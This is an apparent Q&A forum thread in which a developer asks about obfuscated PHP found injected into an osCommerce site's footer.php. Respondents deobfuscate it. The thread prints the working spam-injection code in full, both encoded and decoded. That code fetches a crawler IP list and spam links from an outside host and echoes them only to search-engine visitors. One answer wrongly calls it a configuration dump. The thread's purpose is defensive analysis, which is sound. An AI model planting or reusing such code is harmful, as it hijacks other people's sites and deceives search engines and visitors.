# Is this code an exploit? What is this code?

Tags: php, exploit, shellcode

I'm looking at a site that has been exploited by someone/something. The site has had a bunch of links injected into it's footer that links to pharmaceutical pitches, and who knows what else. There are/were a lot of links right at the top of the footer. I can only find these now, on the cached pages in the Yahoo index. Google is still not happy w/ the site though, and the live site does not show any links anymore. This is for a client..so I mostly know what I was told, and what I can find else wise.

I found this code at the very 'tip/top' of the footer.php (it's an OsCommerse Site):

```
<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m"; 
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>
```

When I view the source cached pages that have the 'Bad' links, this code fits right in where I found it in the footer.php source. A little research on google show that there are exploits out there w/ similar code.

What do you think, when I run it on my own server all I get is the echoed comment in the source only like so:

```
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
```

I don't want to just hastily remove the code and say 'your good' just because it looks bad, especially because I have no immediate way of knowing that the 'bad links' are gone. BTW, the links all go to a dead URL.

You can see the bad pages still cached at Yahoo:
[http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/cache.aspx?q=http%3a%2f%2fwww.feedroller.com%2f+medicine&d=4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--](http://74.6.117.48/search/srpcache?ei=UTF-8&p=http://www.feedroller.com/%20medicine&fr=yfp-t-701&u=http://cc.bingj.com/cache.aspx?q=http://www.feedroller.com/%20medicine&d=4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--)

Comment: this is just an encrypted data.

Comment: Yes, it's exploit code. deliberately obfuscated to make it "hard" to see what it does. Once you go through the obfuscation layers, it'll boil down to something like `eval($do_something_nasty)`.

Comment: `echo -n 'primitive' | md5 # => 069c5b4fe5027f9b37de31d2be5eac67` :)

Comment: @marc I figured it was an attempt to 'obfuscate', thats part of what made it jump out at me. I'm gonna remove it and see if things run a bit smoother. Thanks

Answer (score 2, accepted):

here's the unobfuscated script (more or less)

it's just dumping the contents of [this url](http://genshop.org/paralinks/new/3/feedroller.com.txt) onto your page

it also checks the remote_addr against a [list of IPs](http://genshop.org/script/mask.txt) (google, et al) to try to remain undetected.

looks like you're being attaced by genshop.com

```
<?php

 $count="cou\156\x74"; // count 
 $error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting
 $file="\146\151l\x65"; // file
 $file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents
 $strlen="\163\x74rle\156"; // strlen
 $strpos="\163tr\160o\x73"; // strpos
 $substr="su\x62\x73\164\162"; // substr
 $trim="tr\151m"; //trim

ini_set(' display_errors','off');
$error_reporting(0);

$x0b = "http://genshop.org/scripts/mask.txt";
$url = $x0b;
$tmp = "REMOTE_ADDR";
$x0d = $_SERVER[$tmp];
$tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt";

$IPs = @ $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
    $curr_ip = $trim($ips[$i]);
        if ( $curr_ip != "" ) {
            if ( ($x11 = $strpos($curr_ip, "*")) !== false )
                $curr_ip = $substr($curr_ip, 0,$x11);

            // check visitor ip against mask list
            if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
                $x12 = $file_get_content($tmp_filename);
                echo "$x12";
                // print spam contents
            }
        }
    }
echo $curr_ip;
}

$tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";
echo $tmp2;
?>
```

Comment: How would they get that into the source? Is it just a case of bad file permissions or is it a case of bad hosting or both?

Comment: my guess is you have some script somewhere that writes to your disk, and it is exploitable.  perhaps and upload script or some off the shelf cgi that modifies the filesystem ?  Are you running exec() or system() anywhere? fixable with better permissions, but i'd be best if you found and closed the hole.

Comment: exploit code is always weird... notice they have extra code to fix the asterisk in their mask ip list... why not just alter the mask.txt ? lol.

Comment: Thanks, I'll have to look around at it. It's not my site, I only just looked at it this morning because of the exploit. It's an OsCommerse site, so 'exec()' or 'system()' is quite likely. The admin section shows all the files and allows for many operations...for starters.

Comment: ah, if they are using packaged software, then i would start by checking the security notices on OsCommerce.  they probably already know about this and have a fix.

Comment: Good advice, a good 'ol fashioned update may just patch the hole :)

Comment: OsCommerce also requires that register_globals be enabled. This is the main reason I instantly threw it out as a candidate for one client's e-commerce requirements.

Answer (score 3):

It seems to reference / load two URLs:

- http://genshop.org/script/mask.txt
- http://genshop.org/paralinks/new/3/feedroller.com.txt

It's just a spam distribution script.

---

For partial unobfuscation use:

```
print preg_replace('#"[^"]+\\\\\w+"#e', "stripcslashes('$0')", $source);
```

Answer (score 2):

It very much is an attempt to dump information about your running configuration. Remove it immediately.

The way it works is very complicated, and is beyond me, but its one of the first steps at hacking your site.

Comment: Thanks for the answer, it is beyond me as well. I'm gonna remove it and get back here a little later. I think I'll look through all the source and try to find more. Thanks

Comment: @rhaag71 you should probably change ftp and any server login passwords that you have as well, or the same guy can just come back.